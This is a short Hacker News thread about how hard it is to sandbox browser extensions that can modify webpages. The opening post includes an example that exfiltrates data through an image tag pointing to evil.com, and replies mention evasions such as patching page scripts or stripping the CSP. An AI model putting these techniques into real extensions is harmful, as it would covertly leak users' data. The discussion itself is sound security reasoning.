undefined | Better HN

Skip to content

Top Best Ask Show New Jobs

0 pointslondons_explore5y ago0 comments

Most extensions need the ability to modify webpages. With that ability, they can easily exfiltrate data by for example adding a <img src=evil.com/?data=82374682376>.

Trying to sandbox an extension that can modify arbitrary webpages in arbitrary ways is near futile.

0 comments

6 comments · 2 top-level

nitrogen5y ago· 2 in thread

Trying to sandbox an extension that can modify arbitrary webpages in arbitrary ways is near futile.

Just don't let them create script elements, or add any URLs that don't come from within the extension bundle itself. Browsers already have to do a ton of bookkeeping to track the origins of requests anyway. Doesn't seem hard, you just have to be thorough.

Dylan168075y ago

Restricting the extension to pre-baked URLs means it takes several page loads to exfiltrate something, but doesn't stop it.

londons_exploreOP5y ago

There would be ways to trick the original page into adding stuff for you.

For example, you could patch some of the original script of the page and wait for it to be run.

angry_octet5y ago· 2 in thread

Couldn't CSP be used to limit which paths were valid URLs?

There could also be hierarchies of extension permissions, because they don't all need to be able to do everything.

gruez5y ago

extensions can also remove/add CSPs I think, either through modifying the header or modifying the DOM.

angry_octet5y ago

Yes, but you could strictly limit which extensions had that permission, make it a site specific permission, etc. Auto disabling an extension that changes to require that permission would be a start.

j / k navigate · click thread line to collapse